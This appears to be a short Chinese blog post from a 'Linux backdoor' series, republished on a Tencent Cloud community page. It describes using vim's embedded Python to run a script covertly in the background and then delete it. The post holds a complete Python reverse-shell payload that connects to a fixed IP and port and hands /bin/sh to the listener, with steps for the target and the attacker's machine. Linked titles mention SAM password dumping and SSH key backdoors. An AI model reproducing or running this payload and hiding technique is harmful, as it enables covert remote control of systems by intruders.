专栏首页漫流砂vim 后门 | Linux 后门系列

vim 后门 | Linux 后门系列

$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo.py

查看 Ubuntu 16.04 的 vim 支持情况

反弹shell代码

import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect(("192.168.108.12", 5555));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);

靶机 执行 vim -E -c "py3file 1.py"

物理机 监听5555端口并获取反弹的shell

参考文章:

https://youtu.be/kahNGFF2AU8

本文分享自微信公众号 - 漫流砂(yidalidemao)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-01

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 提权(六) Dump SAM

    在提权到现在我们分别通过系统的自身功能,还有一些辅助工具,最终又使用一些比如嗅探等边缘策略,接下来我们要硬杠Windows的密码了,通过各种方式来获取windo...

    意大利的猫
  • Nmap NSE 缺陷

    可以看到,我在 portrule 处直接返回了 true ,所以按照规则来说,无论端口是什么规则,都会执行,但是结果如下

    意大利的猫
  • SSH 后门 | Nmap 脚本

    将公钥 id_rsa.pub 上传到目标主机,保存为 ~/.ssh/authorized_keys

    意大利的猫
  • 【资源】Python实现多种模型(Naive Bayes, SVM, CNN, LSTM, etc)用于推文情感分析

    【导读】近日,Abdul Fatir 在自己的CS5228课程报告使用不同的方法进行Tweets情感分析(作为二分类问题),并对这些方法的性能进行比较,主要是基...

    WZEARW
  • C# dotnet core 局域网组播方法

    我在微软官网找到了用 C# 做 UDP 组播的方法,我优化一些逻辑,保留核心代码,然后加了一点封装

    林德熙
  • 开源软件安全现状分析报告

    一、背景情况 开源软件具有开放、共享、自由等特性,在软件开发中扮演着越来越重要的角色,也是软件供应链的重要组成部分。据Gartner调查显示,99%的组织在其 ...

    FB客服
  • 订阅技术类型的公众号 究竟是为了什么?

    第一种:某些大厂的CTO、CEO(根据自己影响力,去编写一些曾经自己nb经历,以及自己对年轻人相关建议,大局观)

    八点半的Bruce、D
  • 关于volatile的坑

    Java的面试基础问题中,经常出现并发相关的问题。比如volatile关键字,是出现频率相当高的一个问题。 如果说volatile和synchronized的区...

    PhoenixZheng
  • Opportunity的chance of success的赋值逻辑

    从下列function module CRM_OPPORT_H_PROB_SET_EC可看出,当status不为代码中的这些硬编码的值时,chance of s...

    Jerry Wang
  • 数据结构与算法学习笔记之 适合大规模的数据排序 数据结构与算法学习笔记之如何分析一个排序算法?

    在数据排序的算法中,不同数据规模应当使用合适的排序算法才能达到最好的效果,如小规模的数据排序,可以使用冒泡排序、插入排序,选择排序,他们的时间复杂度都为O(n...

    Dawnzhang

扫码关注云+社区

领取腾讯云代金券